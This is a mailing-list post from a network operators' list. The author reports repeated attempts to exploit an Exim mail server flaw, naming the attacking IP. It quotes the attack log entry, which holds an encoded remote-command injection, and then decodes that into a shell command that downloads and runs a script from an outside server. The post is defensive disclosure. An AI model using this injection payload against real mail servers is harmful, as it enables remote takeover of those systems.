Russian Anal Probing + Malware

Andy Smith andy at strugglers.net
Sun Jun 23 04:04:13 UTC 2019


Hello,

On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
> What malware slinging?

Some user there is trying to exploit CVE-2018-10149:

2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"

Plus another 17 attempts by that IP through to 19 June.

$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"

(I replaced https with hxxps to prevent auto-link-followers from
hitting the site.)

Cheers,
Andy



More information about the NANOG mailing list